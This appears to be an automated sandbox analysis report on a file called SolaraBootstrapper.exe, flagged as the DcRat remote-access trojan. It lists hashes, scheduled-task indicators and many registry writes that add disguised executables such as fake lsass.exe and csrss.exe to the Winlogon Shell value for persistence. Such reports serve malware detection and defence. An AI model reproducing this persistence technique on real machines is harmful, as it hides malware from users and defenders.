Analysis
-
max time kernel
1800s -
max time network
1804s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
21-07-2024 20:15
Behavioral task
behavioral1
Sample
SolaraBootstrapper.exe
Resource
win7-20240708-en
General
-
Target
SolaraBootstrapper.exe
-
Size
9.5MB
-
MD5
4050f2027e946d524e3a1078a6cd5419
-
SHA1
698f02a2826e7d6ecfebf37b04f0231c904133eb
-
SHA256
2cecd998dd0dda41ee0aefbd0c6a490fb42cb506fcfb2e1dafc0a89b781af9ab
-
SHA512
fed614ebd8197c8809d32e0437dd49fd87640d3fbe0ae806479e79f2480975e404306821c43e726b55d17c02298bb088175ee079bc88d8a8fe942f3d4cd9afab
-
SSDEEP
196608:HE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5nQ:HE9B0OjrdLK4J/FQ
Malware Config
Signatures
-
DcRat 64 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeSolaraBootstrapper.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 936 schtasks.exe 1864 schtasks.exe 2592 2436 schtasks.exe 1700 schtasks.exe 1936 2392 2384 schtasks.exe 2028 schtasks.exe 788 schtasks.exe 2636 schtasks.exe 1936 schtasks.exe 2804 schtasks.exe 1240 schtasks.exe 2240 schtasks.exe 2224 schtasks.exe 720 schtasks.exe 2788 2584 1360 600 schtasks.exe 1848 schtasks.exe 1252 schtasks.exe 2148 schtasks.exe 1252 schtasks.exe 3020 schtasks.exe 2092 schtasks.exe 2124 schtasks.exe 1060 schtasks.exe 1240 916 schtasks.exe 1856 schtasks.exe 2496 schtasks.exe 1224 schtasks.exe 2604 1760 1716 schtasks.exe 2076 schtasks.exe 2460 schtasks.exe 1912 2132 1940 2056 Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\14.0\Common SolaraBootstrapper.exe 1868 schtasks.exe 928 schtasks.exe 1936 2832 1588 schtasks.exe 1536 schtasks.exe 2336 schtasks.exe 2944 schtasks.exe 2236 schtasks.exe 2044 2260 2604 schtasks.exe 2584 schtasks.exe 2600 schtasks.exe 2216 2116 schtasks.exe 2620 schtasks.exe 2308 1704 schtasks.exe 1428 schtasks.exe -
Modifies WinLogon for persistence 2 TTPs 43 IoCs
Processes:
Refcrt.exeRefcrt.exeRefcrt.exesddsfsdf.exeRoblox.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\winNet\\Idle.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\winNet\\spoolsv.exe\", \"C:\\Users\\Default\\conhost.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Users\\Admin\\WmiPrvSE.exe\", \"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\", \"C:\\Users\\All Users\\Microsoft\\IdentityCRL\\audiodg.exe\", \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\conhost.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\", \"C:\\Users\\All Users\\audiodg.exe\", \"C:\\winNet\\lsm.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\lsass.exe\", \"C:\\winNet\\wscript.exe\", \"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\", \"C:\\DriversavessessionDlldhcp\\csrss.exe\", \"C:\\Windows\\de-DE\\WmiPrvSE.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Windows\\Downloaded Program Files\\explorer.exe\", \"C:\\winNet\\lsass.exe\", \"C:\\Windows\\Offline Web Pages\\csrss.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\dllhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\", \"C:\\Users\\Admin\\Documents\\My Videos\\csrss.exe\", \"C:\\Users\\All Users\\Microsoft\\eHome\\wininit.exe\", \"C:\\Program Files\\Windows Journal\\fr-FR\\conhost.exe\", \"C:\\MSOCache\\All Users\\msiexec.exe\", \"C:\\DriversavessessionDlldhcp\\dwm.exe\", \"C:\\winNet\\sddsfsdf.exe\", \"C:\\Users\\Admin\\AppData\\Local\\csrss.exe\", \"C:\\DriversavessessionDlldhcp\\Roblox.exe\", \"C:\\Program Files (x86)\\Common Files\\DESIGNER\\taskhost.exe\", \"C:\\Users\\Default User\\dllhost.exe\", \"C:\\Windows\\BitLockerDiscoveryVolumeContents\\msiexec.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\Packages\\Debugger\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0019-0409-0000-0000000FF1CE}-C\\WmiPrvSE.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\DriversavessessionDlldhcp\\lsass.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\conhost.exe\", \"C:\\MSOCache\\All Users\\{90140000-0116-0409-1000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\Windows\\Offline Web Pages\\Refcrt.exe\", \"C:\\Program Files\\Microsoft Office\\Office14\\1033\\dllhost.exe\", \"C:\\winNet\\Bloxstrap.exe\"" Refcrt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell 